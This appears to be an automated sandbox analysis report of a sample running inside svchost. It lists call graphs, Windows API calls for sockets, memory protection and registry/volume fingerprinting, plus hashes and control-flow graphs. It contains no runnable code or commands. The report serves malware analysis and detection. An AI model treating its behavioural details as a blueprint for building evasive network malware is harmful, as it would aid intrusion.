strlen 14011->14012 14011->14013 14012->14013 14013->14010 14013->14011 14015 4d7210a 14014->14015 14016 4d720e9 14014->14016 14015->13979 14016->14015 14017 4d720f6 free 14016->14017 14017->14016 14021 4d7a6cc 14018->14021 14019 4d7a6f3 strchr 14020 4d7a709 strchr 14019->14020 14019->14021 14020->14021 14021->14019 14022 4d7a7f4 14021->14022 14024 4d7a794 __cfltcvt 14021->14024 14023 4d7a5d6 strchr 14022->14023 14022->14024 14023->14024 14024->13999 14026 4d7a66f __cfltcvt 14025->14026 14028 4d7a5fb 14025->14028 14026->13999 14027 4d7a600 strchr 14027->14028 14028->14026 14028->14027 14030 4d72272 14029->14030 14030->13988 14032 4d765a4 memset 14031->14032 14033 4d765c6 14031->14033 14032->14033 14033->13990 14035 4d722cc 14034->14035 14038 4d72303 14035->14038 14043 4d74fc6 14038->14043 14041 4d72180 14041->13955 14042 4d7234d free 14042->14041 14053 4d74f50 malloc 14043->14053 14045 4d74fd7 14046 4d74fe8 __cfltcvt 14045->14046 14047 4d75024 __cfltcvt 14045->14047 14052 4d7231d 14045->14052 14046->14052 14063 4d7be87 14046->14063 14059 4d7be45 14047->14059 14049 4d7501f 14051 4d7508a 39 API calls 14049->14051 14049->14052 14051->14052 14052->14041 14052->14042 14054 4d74f68 14053->14054 14055 4d74f6f free 14054->14055 14056 4d74f7b 14054->14056 14055->14045 14067 4d74f8b malloc memset 14056->14067 14058 4d74f87 14058->14045 14060 4d7be53 14059->14060 14062 4d7be72 14059->14062 14060->14062 14069 4d7b1b1 14060->14069 14062->14049 14064 4d7be95 14063->14064 14066 4d7beb5 14063->14066 14064->14066 14117 4d7b314 14064->14117 14066->14049 14068 4d74fad 14067->14068 14068->14058 14070 4d7b1d2 14069->14070 14075 4d7b1c9 14069->14075 14071 4d7b1eb 14070->14071 14080 4d7bdce 14070->14080 14073 4d7b21e memset 14071->14073 14071->14075 14084 4d7bf21 14071->14084 14077 4d7b25d 14073->14077 14075->14062 14077->14075 14078 4d7b2af GetLastError 14077->14078 14078->14075 14079 4d7b2bc WSAGetLastError 14078->14079 14079->14075 14081 4d7bdda 14080->14081 14083 4d7bdf5 14080->14083 14081->14083 14087 4d7ab5a 14081->14087 14083->14071 14115 4d7bee9 WSAIoctl 14084->14115 14090 4d7ab70 14087->14090 14089 4d7ab6c 14089->14083 14091 4d7abe7 bind 14090->14091 14092 4d7ab7e socket 14090->14092 14093 4d7abfb WSAGetLastError 14091->14093 14098 4d7ab98 14091->14098 14094 4d7ab92 WSAGetLastError 14092->14094 14095 4d7aba8 SetHandleInformation 14092->14095 14093->14098 14094->14098 14096 4d7abb7 GetLastError 14095->14096 14097 4d7abd1 14095->14097 14099 4d7abc6 14096->14099 14103 4d7ac1b ioctlsocket 14097->14103 14098->14089 14102 4d7abc8 closesocket 14099->14102 14101 4d7abe0 14101->14091 14101->14102 14102->14098 14104 4d7ac57 CreateIoCompletionPort 14103->14104 14105 4d7ac41 WSAGetLastError 14103->14105 14106 4d7ac73 14104->14106 14109 4d7ac79 14104->14109 14110 4d7ac47 14105->14110 14107 4d7acaf GetLastError 14106->14107 14106->14109 14107->14110 14108 4d7aca9 14108->14110 14111 4d7ad14 setsockopt _errno 14108->14111 14113 4d7acdc 14108->14113 14109->14108 14112 4d7aca0 SetFileCompletionNotificationModes 14109->14112 14110->14101 14111->14113 14112->14108 14113->14110 14114 4d7ad4b _errno 14113->14114 14114->14110 14116 4d7b20e 14115->14116 14116->14073 14116->14075 14118 4d7b335 14117->14118 14127 4d7b32c 14117->14127 14119 4d7b34f 14118->14119 14128 4d7be09 14118->14128 14121 4d7b382 memset 14119->14121 14122 4d7bf21 WSAIoctl 14119->14122 14119->14127 14124 4d7b3c1 14121->14124 14123 4d7b372 14122->14123 14123->14121 14123->14127 14125 4d7b413 GetLastError 14124->14125 14124->14127 14126 4d7b420 WSAGetLastError 14125->14126 14125->14127 14126->14127 14127->14066 14129 4d7be31 14128->14129 14130 4d7be15 14128->14130 14129->14119 14130->14129 14132 4d7ada5 14130->14132 14133 4d7ab70 15 API calls 14132->14133 14134 4d7adb7 14133->14134 14134->14129 14135 4d7531f 14136 4d751cd 7 API calls 14135->14136 14137 4d7533c 14136->14137 13751 4d732b0 calloc 13752 4d732d4 memset time srand calloc 13751->13752 13753 4d734e2 13751->13753 13755 4d734b7 free 13752->13755 13757 4d7333a 13752->13757 13755->13753 13779 4d747fd 13757->13779 13759 4d73358 13791 4d75725 13759->13791 13761 4d73366 memset strlen 13794 4d76453 13761->13794 13763 4d73385 13764 4d7349a 13763->13764 13799 4d7993f 13763->13799 13766 4d74a6e free 13764->13766 13768 4d734a3 13766->13768 13767 4d73395 13770 4d7346c 13767->13770 13771 4d73409 calloc 13767->13771 13769 4d734ab free 13768->13769 13769->13755 13802 4d799db 13770->13802 13771->13770 13772 4d7341f 13771->13772 13773 4d73459 strlen 13772->13773 13775 4d7342a sprintf 13772->13775 13773->13770 13775->13775 13777 4d73456 13775->13777 13777->13773 13778 4d73490 free 13778->13764 13810 4d776f6 13779->13810 13781 4d74816 GetCurrentProcess 13815 4d7327f GetModuleHandleA GetProcAddress 13781->13815 13785 4d74891 GetSystemDirectoryW 13789 4d748a7 GetVolumeInformationW 13785->13789 13790 4d748cc __cfltcvt 13785->13790 13786 4d74849 RegQueryValueExW 13787 4d7486f 13786->13787 13788 4d74888 RegCloseKey 13786->13788 13787->13788 13788->13785 13789->13790 13790->13759 13818 4d7f5d6 memset 13791->13818 13793 4d75743 13793->13761 13795 4d76462 strlen 13794->13795 13796 4d76469 13794->13796 13795->13796 13819 4d764ab 13796->13819 13798 4d76477 13798->13763 13800 4d79c78 5 API calls 13799->13800 13801 4d7994e 13800->13801 13801->13767 13805 4d799e6 13802->13805 13803 4d73488 13803->13764 13803->13778 13805->13803 13807 4d79a1b 13805->13807 13824 4d79b1e 13805->13824 13834 4d79cdf GetTickCount 13805->13834 13807->13803 13807->13805 13836 4d79a96 13807->13836 13840 4d79c10 13807->13840 13811 4d77703 13810->13811 13812 4d776ff 13810->13812 13817 4d76636 memset 13811->13817 13812->13781 13814 4d77710 13814->13781 13816 4d732a2 RegOpenKeyExW 13815->13816 13816->13785 13816->13786 13817->13814 13818->13793 13820 4d764df 13819->13820 13821 4d764bc memcmp 13819->13821 13822 4d764d0 13820->13822 13823 4d764e4 memcmp 13820->13823 13821->13820 13821->13822 13822->13798 13823->13822 13825 4d79be4 13824->13825 13826 4d79b30 13824->13826 13825->13807 13826->13825 13828 4d79b7f 13826->13828 13847 4d7ba74 13826->13847 13852 4d7b62c 13826->13852 13865 4d7b985 13826->13865 13872 4d7cfe4 13826->13872 13879 4d7c9b6 13826->13879 13828->13826 13859 4d7b8aa 13828->13859 13835 4d79cee 13834->13835 13835->13805 13838 4d79a9b 13836->13838 13837 4d79af4 13837->13807 13838->13837 13929 4d7a964 13838->13929 13841 4d79c26 GetQueuedCompletionStatus 13840->13841 13842 4d79c1f 13840->13842 13844 4d79c51 GetLastError 13841->13844 13846 4d79c43 13841->13846 13946 4d7a3bd 13842->13946 13844->13846 13846->13807 13848 4d7ba82 13847->13848 13849 4d7bab7 setsockopt 13848->13849 13850 4d7bad2 13848->13850 13849->13850 13851 4d7baf0 WSAGetLastError 13849->13851 13850->13826 13851->13850 13856 4d7b6db 13852->13856 13858 4d7b64c 13852->13858 13853 4d7b719 WSARecv 13854 4d7b7e3 WSAGetLastError 13853->13854 13853->13856 13857 4d7b762 13854->13857 13855 4d7b055 8 API calls 13855->13858 13856->13853 13856->13857 13857->13855 13857->13858 13858->13826 13863 4d7b8c0 13859->13863 13860 4d7b900 13862 4d7b90e 13860->13862 13864 4d7b907 CloseHandle 13860->13864 13861 4d7b8f9 UnregisterWait 13861->13860 13862->13828 13863->13860 13863->13861 13863->13862 13864->13862 13866 4d7b9ea 13865->13866 13871 4d7b998 13865->13871 13867 4d7b9f4 setsockopt 13866->13867 13868 4d7ba31 closesocket 13866->13868 13867->13868 13867->13871 13869 4d7ba44 13868->13869 13868->13871 13885 4d7adbb socket 13869->13885 13871->13826 13873 4d7d003 13872->13873 13874 4d7d0b9 memset WSARecvFrom 13873->13874 13878 4d7d01f 13873->13878 13876 4d7d10f WSAGetLastError 13874->13876 13874->13878 13876->13878 13877 4d7d1a8 13877->13826 13878->13877 13901 4d7ce0a memset 13878->13901 13880 4d7c9d0 13879->13880 13881 4d7c9c9 13879->13881 13916 4d7cafe 13880->13916 13912 4d7c9da 13881->13912 13884 4d7c9ce 13884->13826 13886 4d7adf5 13885->13886 13887 4d7ae1d SetHandleInformation 13885->13887 13886->13871 13888 4d7ae2c 13887->13888 13889 4d7ae68 memset 13887->13889 13898 4d7ae57 closesocket 13888->13898 13890 4d7ae85 13889->13890 13891 4d7aeb5 13890->13891 13892 4d7aed4 GetLastError 13890->13892 13891->13886 13896 4d7af51 RegisterWaitForSingleObject 13891->13896 13892->13891 13893 4d7aee1 WSAGetLastError 13892->13893 13894 4d7aef3 WSAGetLastError 13893->13894 13895 4d7aeeb WSAGetLastError 13893->13895 13897 4d7af03 13894->13897 13895->13897 13896->13886 13899 4d7af0f closesocket 13897->13899 13898->13886 13899->13886 13900 4d7af22 CloseHandle 13899->13900 13900->13886 13902 4d7cf07 13901->13902 13903 4d7ce3b memset 13901->13903 13905 4d7cf5c GetLastError 13902->13905 13911 4d7ce9d 13902->13911 13907 4d7ce99 13903->13907 13906 4d7cf69 WSAGetLastError 13905->13906 13905->13911 13908 4d7cf73 WSAGetLastError 13906->13908 13909 4d7cf7b WSAGetLastError 13906->13909 13910 4d7cecf GetLastError 13907->13910 13907->13911 13908->13911 13909->13911 13910->13911 13911->13877 13915 4d7c9ef 13912->13915 13913 4d7cad4 13913->13884 13915->13913 13920 4d7c71a 13915->13920 13917 4d7cb13 13916->13917 13918 4d7cbaf 13917->13918 13925 4d7c83a 13917->13925 13918->13884 13921 4d7c733 memset 13920->13921 13923 4d7c391 7 API calls 13921->13923 13924 4d7c7d6 13923->13924 13924->13913 13926 4d7c850 QueueUserWorkItem 13925->13926 13928 4d7c8ab 13926->13928 13928->13918 13930 4d7a97d 13929->13930 13932 4d7aa48 13929->13932 13931 4d7a991 13930->13931 13930->13932 13933 4d7a9db shutdown 13931->13933 13938 4d7a9ce 13931->13938 13934 4d7aa64 closesocket 13932->13934 13932->13938 13942 4d7aa70 13932->13942 13935 4d7a9f1 WSAGetLastError 13933->13935 13933->13938 13934->13942 13935->13938 13936 4d7aaf6 13936->13938 13939 4d7ab17 13936->13939 13940 4d7ab0c UnregisterWait 13936->13940 13937 4d7aae9 free 13937->13936 13938->13838 13939->13938 13941 4d7ab1e CloseHandle 13939->13941 13940->13939 13941->13938 13942->13936 13942->13937 13943 4d7aaab UnregisterWait 13942->13943 13944 4d7aac5 CloseHandle 13942->13944 13945 4d7aae7 13942->13945 13943->13942 13944->13942 13945->13937 13947 4d7a3ce 13946->13947 13948 4d79cdf GetTickCount 13947->13948 13949 4d79c25 13947->13949 13948->13949 13949->13841 12843 4d750a6 12844 4d750b3 12843->12844 12847 4d750c1 12844->12847 12851 4d7511c 12844->12851 12858 4d74a6e 12847->12858 12865 4d7f4f8 12851->12865 12853 4d75127 12854 4d74a6e free 12853->12854 12855 4d75133 12854->12855 12881 4d75145 memset 12855->12881 12857 4d75139 free 12857->12847 12859 4d74a8e 12858->12859 12860 4d74a7b 12858->12860 12862 4d750e9 12859->12862 12860->12859 12949 4d749fc 12860->12949 12952 4d7a4d6 12862->12952 12864 4d750db 12866 4d7f505 _mbstowcs_s 12865->12866 12876 4d7f5b9 _mbstowcs_s 12865->12876 12867 4d7f547 12866->12867 12869 4d7f53f free 12866->12869 12868 4d7f554 12867->12868 12883 4d7f42f 12867->12883 12880 4d7f577 12868->12880 12889 4d7f46f 12868->12889 12869->12867 12871 4d7f596 12875 4d7f5a7 strlen 12871->12875 12871->12876 12873 4d7f4cb free 12873->12871 12874 4d7f567 12877 4d7f42f free 12874->12877 12875->12876 12876->12853 12878 4d7f56f 12877->12878 12893 4d7f4cb 12878->12893 12880->12871 12880->12873 12882 4d75166 12881->12882 12882->12857 12884 4d7f45f _mbstowcs_s 12883->12884 12885 4d7f438 12883->12885 12884->12868 12897 4d82060 12885->12897 12887 4d7f456 12888 4d82060 free 12887->12888 12888->12884 12890 4d7f47b 12889->12890 12892 4d7f491 _mbstowcs_s 12889->12892 12901 4d84a37 12890->12901 12892->12874 12894 4d7f4ec _mbstowcs_s 12893->12894 12895 4d7f4d4 12893->12895 12894->12880 12895->12894 12896 4d7f4e1 free 12895->12896 12896->12894 12898 4d8209c _mbstowcs_s 12897->12898 12899 4d82069 _mbstowcs_s 12897->12899 12898->12887 12899->12898 12900 4d82090 free 12899->12900 12900->12898 12902 4d84a40 12901->12902 12910 4d84a6a 12901->12910 12911 4d861bb 12902->12911 12905 4d861bb __cfltcvt free 12906 4d84a58 12905->12906 12919 4d7f848 12906->12919 12910->12892 12912 4d861c4 12911->12912 12918 4d84a4c 12911->12918 12913 4d7f848 _mbstowcs_s free 12912->12913 12914 4d861ca 12913->12914 12915 4d7f848 _mbstowcs_s free 12914->12915 12916 4d861d3 12915->12916 12917 4d7f848 _mbstowcs_s free 12916->12917 12917->12918 12918->12905 12920 4d7f851 _mbstowcs_s 12919->12920 12921 4d7f86d 12919->12921 12920->12921 12922 4d7f861 free 12920->12922 12923 4d84a6f 12921->12923 12922->12921 12934 4d861e1 12923->12934 12925 4d84a7a 12926 4d7f848 _mbstowcs_s free 12925->12926 12927 4d84a83 12926->12927 12928 4d861bb __cfltcvt free 12927->12928 12929 4d84a8f 12928->12929 12930 4d861bb __cfltcvt free 12929->12930 12931 4d84a9b 12930->12931 12932 4d7f848 _mbstowcs_s free 12931->12932 12933 4d84aa7 12932->12933 12933->12910 12935 4d861ed 12934->12935 12936 4d86250 _mbstowcs_s 12934->12936 12937 4d7f848 _mbstowcs_s free 12935->12937 12938 4d86220 12935->12938 12936->12925 12940 4d861fc 12937->12940 12938->12936 12939 4d86245 free 12938->12939 12941 4d861bb __cfltcvt free 12938->12941 12939->12936 12942 4d7f848 _mbstowcs_s free 12940->12942 12941->12938 12943 4d86205 12942->12943 12944 4d7f848 _mbstowcs_s free 12943->12944 12945 4d8620e 12944->12945 12946 4d861bb __cfltcvt free 12945->12946 12947 4d86217 12946->12947 12948 4d7f848 _mbstowcs_s free 12947->12948 12948->12938 12950 4d74a06 free 12949->12950 12951 4d74a11 12949->12951 12950->12951 12951->12859 12953 4d7a4e5 12952->12953 12961 4d7a502 12952->12961 12954 4d7a570 abort 12953->12954 12955 4d7a507 12953->12955 12956 4d7a510 12953->12956 12957 4d7a4fb 12953->12957 12953->12961 12959 4d7cd86 closesocket 12955->12959 12960 4d7cbd9 12 API calls 12956->12960 12958 4d7bb4c 5 API calls 12957->12958 12958->12961 12959->12961 12960->12961 12961->12864 14153 4d7992a SetErrorMode 14154 4d7993a 14153->14154 14155 4d7bf7a WSAStartup 14154->14155 14170 4d7bd3a memset htons inet_addr 14155->14170 14157 4d7bfa9 14171 4d7bd81 memset htons 14157->14171 14160 4d7bff2 getsockopt 14162 4d7c017 14160->14162 14163 4d7c021 closesocket 14160->14163 14161 4d7c02a WSAGetLastError 14165 4d7c036 14161->14165 14162->14163 14164 4d7c037 socket 14163->14164 14166 4d7c07c WSAGetLastError 14164->14166 14167 4d7c048 closesocket 14164->14167 14165->14164 14168 4d7c088 14166->14168 14167->14168 14170->14157 14172 4d7a59e 4 API calls 14171->14172 14173 4d7bdba socket 14172->14173 14173->14160 14173->14161

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 04D7B055 Relevance: 12.1, APIs: 8, Instructions: 122networkregistryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • memset.MSVCRT ref: 04D7B06C
                                                                                                                                                            • memset.MSVCRT ref: 04D7B0B8
                                                                                                                                                            • WSARecv.WS2_32(FFE0458D,00000000,00000001,?,00000000,04D728E9,00000000), ref: 04D7B0E6
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 04D7B110
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 04D7B11D
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 04D7B127
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 04D7B12F
                                                                                                                                                            • RegisterWaitForSingleObject.KERNEL32(04D72909,30C48300,04D7AF9E,04D728D9,000000FF,00000004), ref: 04D7B179
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$memset$ObjectRecvRegisterSingleWait
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2020750497-0
                                                                                                                                                            • Opcode ID: ea1f4e3be071ea27efcb8f8deb0ab93eeeb2c9faaa7f85fa5bbc92254c388f84
                                                                                                                                                            • Instruction ID: 1dd7fd0398371deb22a367135dfd48dfb438ac861f8c521531d1d287b2817244
                                                                                                                                                            • Opcode Fuzzy Hash: ea1f4e3be071ea27efcb8f8deb0ab93eeeb2c9faaa7f85fa5bbc92254c388f84
                                                                                                                                                            • Instruction Fuzzy Hash: 66418E31600605BFE7219F24CC45BAABBF8FF04358F10496AE996D6690E774F914DB90
                                                                                                                                                            Function 04D7AB70 Relevance: 10.6, APIs: 7, Instructions: 64networkCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 133 4d7ab70-4d7ab7c 134 4d7abe7-4d7abf9 bind 133->134 135 4d7ab7e-4d7ab90 socket 133->135 136 4d7ac11-4d7ac15 134->136 137 4d7abfb-4d7ac08 WSAGetLastError 134->137 138 4d7ab92 WSAGetLastError 135->138 139 4d7aba8-4d7abb5 SetHandleInformation 135->139 142 4d7ac17-4d7ac1a 136->142 140 4d7ac0a-4d7ac0e 137->140 141 4d7ab98-4d7aba2 call 4d7bd00 137->141 138->141 143 4d7abb7-4d7abc7 GetLastError call 4d7bd00 139->143 144 4d7abd1-4d7abdb call 4d7ac1b 139->144 140->136 151 4d7aba3-4d7aba6 141->151 152 4d7abc8-4d7abcf closesocket 143->152 150 4d7abe0-4d7abe5 144->150 150->134 150->152 151->142 152->151
                                                                                                                                                            APIs
                                                                                                                                                            • socket.WS2_32(00000010,00000001,00000000), ref: 04D7AB85
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010,04D7BDF5,04D7BE72), ref: 04D7AB92
                                                                                                                                                              • Part of subcall function 04D7AC1B: ioctlsocket.WS2_32(04D7BDF5,8004667E,04D7BE72), ref: 04D7AC36
                                                                                                                                                              • Part of subcall function 04D7AC1B: WSAGetLastError.WS2_32(?,?,04D7ABE0,17E80870,04D7BDF5,00000000,00000010,00000000,?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010), ref: 04D7AC41
                                                                                                                                                            • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010,04D7BDF5,04D7BE72), ref: 04D7ABAD
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010,04D7BDF5,04D7BE72), ref: 04D7ABB7
                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 04D7ABC9
                                                                                                                                                            • bind.WS2_32(50A5A5A5,04D7BDF5,00000002), ref: 04D7ABF0
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010,04D7BDF5,04D7BE72), ref: 04D7ABFB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$HandleInformationbindclosesocketioctlsocketsocket
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2417539845-0
                                                                                                                                                            • Opcode ID: c9136705f1b80664106fb729e0e04d7a0b163efb6808b252258dd27afe0a14c5
                                                                                                                                                            • Instruction ID: 9ca19d0064a9ed401d0fb534ad5f2a3e30275192c845ed0d13b5f29b3aa6a2da
                                                                                                                                                            • Opcode Fuzzy Hash: c9136705f1b80664106fb729e0e04d7a0b163efb6808b252258dd27afe0a14c5
                                                                                                                                                            • Instruction Fuzzy Hash: 6A119031300600BBDB251E70EC08B6E3BA6FB41735F108A19F66AD02E0EB35BC50DA61
                                                                                                                                                            Function 04D732B0 Relevance: 19.7, APIs: 13, Instructions: 194stringCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: callocfree$memsetstrlen$sprintfsrandtime
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2846687148-0
                                                                                                                                                            • Opcode ID: caa86e440c245f5eed9be78647423903edae714b45d50a8acbf1c9d95c26e516
                                                                                                                                                            • Instruction ID: c84066408917861792098bb2848735719549a73f2fbaf3d4fe3b5e031981a2ba
                                                                                                                                                            • Opcode Fuzzy Hash: caa86e440c245f5eed9be78647423903edae714b45d50a8acbf1c9d95c26e516
                                                                                                                                                            • Instruction Fuzzy Hash: 7B715DB1A40705EFEB21DFA5D885AAEBBF8FF08304F10456EE959D6640E734A944CF60
                                                                                                                                                            Function 003502D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00350326
                                                                                                                                                              • Part of subcall function 003500A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 003500CD
                                                                                                                                                              • Part of subcall function 003500A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00350279
                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00350378
                                                                                                                                                            • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 003503E7
                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00350407
                                                                                                                                                            • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 0035042E
                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00350456
                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00350471
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000003.2329135729.0000000000350000.00000040.00000001.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_3_350000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                            • String ID: ,
                                                                                                                                                            • API String ID: 3867569247-3772416878
                                                                                                                                                            • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                            • Instruction ID: c840cdd39ce14b6b0df787053643e1ab2889fdac35f2c2c444f6e15d1c6e7439
                                                                                                                                                            • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                            • Instruction Fuzzy Hash: C7613DB5900209EFCB25DFA5C985EEEBBB9FF08351F108419FA59AB250D731A944CF60
                                                                                                                                                            Function 04D7992A Relevance: 13.6, APIs: 9, Instructions: 99networkCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003), ref: 04D7992F
                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 04D7BF91
                                                                                                                                                              • Part of subcall function 04D7BD3A: memset.MSVCRT ref: 04D7BD4A
                                                                                                                                                              • Part of subcall function 04D7BD3A: htons.WS2_32(00000002), ref: 04D7BD5B
                                                                                                                                                              • Part of subcall function 04D7BD3A: inet_addr.WS2_32(?), ref: 04D7BD68
                                                                                                                                                              • Part of subcall function 04D7BD81: memset.MSVCRT ref: 04D7BD91
                                                                                                                                                              • Part of subcall function 04D7BD81: htons.WS2_32(?), ref: 04D7BDA2
                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 04D7BFDE
                                                                                                                                                            • getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 04D7C00F
                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 04D7C022
                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 04D7C02A
                                                                                                                                                            • socket.WS2_32(00000017,00000001,00000000), ref: 04D7C03F
                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 04D7C074
                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 04D7C07C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Error$Lastclosesockethtonsmemsetsocket$ModeStartupgetsockoptinet_addr
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2777411211-0
                                                                                                                                                            • Opcode ID: 2b011e0e62591dd9499b2cedbaccc601c39f5fdcd2b21441b07f00d685f5edee
                                                                                                                                                            • Instruction ID: 0465bfc2511a38c7f7aba1da6521b66e3629542a33648904cad59353778c5caa
                                                                                                                                                            • Opcode Fuzzy Hash: 2b011e0e62591dd9499b2cedbaccc601c39f5fdcd2b21441b07f00d685f5edee
                                                                                                                                                            • Instruction Fuzzy Hash: 6D31DB72304304BFE610AE64DC49F6B769CEB45764F40095AF609D62C0FB74AC09CBA1
                                                                                                                                                            Function 04D7B478 Relevance: 10.7, APIs: 7, Instructions: 157networkregistryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 99 4d7b478-4d7b4b7 memset * 2 100 4d7b4cf-4d7b4ea WSASend 99->100 101 4d7b4b9-4d7b4cc CreateEventA 99->101 102 4d7b4ec-4d7b4f0 100->102 103 4d7b53b-4d7b546 GetLastError 100->103 101->100 104 4d7b561-4d7b568 102->104 106 4d7b4f2-4d7b506 102->106 103->104 105 4d7b548-4d7b55c WSAGetLastError call 4d7bd00 103->105 110 4d7b575-4d7b589 104->110 111 4d7b56a 104->111 121 4d7b608-4d7b60c 105->121 107 4d7b51e-4d7b536 106->107 108 4d7b508-4d7b50d 106->108 113 4d7b5ff-4d7b605 call 4d7c812 107->113 108->107 112 4d7b50f-4d7b516 108->112 116 4d7b5a1-4d7b5c1 110->116 117 4d7b58b-4d7b590 110->117 115 4d7b56d-4d7b573 111->115 112->107 120 4d7b518-4d7b51b 112->120 118 4d7b606 113->118 115->110 115->115 116->118 119 4d7b5c3-4d7b5dc RegisterWaitForSingleObject 116->119 117->116 123 4d7b592-4d7b599 117->123 118->121 119->118 124 4d7b5de-4d7b5e8 119->124 120->107 123->116 126 4d7b59b-4d7b59e 123->126 128 4d7b5ee-4d7b5f5 124->128 129 4d7b5ea-4d7b5ec 124->129 126->116 132 4d7b5fa-4d7b5fe 128->132 129->132 132->113
                                                                                                                                                            APIs
                                                                                                                                                            • memset.MSVCRT ref: 04D7B49F
                                                                                                                                                            • memset.MSVCRT ref: 04D7B4AB
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,04D750A3,00000000,00000000,04D7505E,00000000), ref: 04D7B4BD
                                                                                                                                                            • WSASend.WS2_32(?,04D750A3,?,00000000,00000000,00000010,00000000), ref: 04D7B4E2
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D7B53B
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D7B548
                                                                                                                                                            • RegisterWaitForSingleObject.KERNEL32(00000048,?,04D7B60D,00000000,000000FF,0000000C), ref: 04D7B5D4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
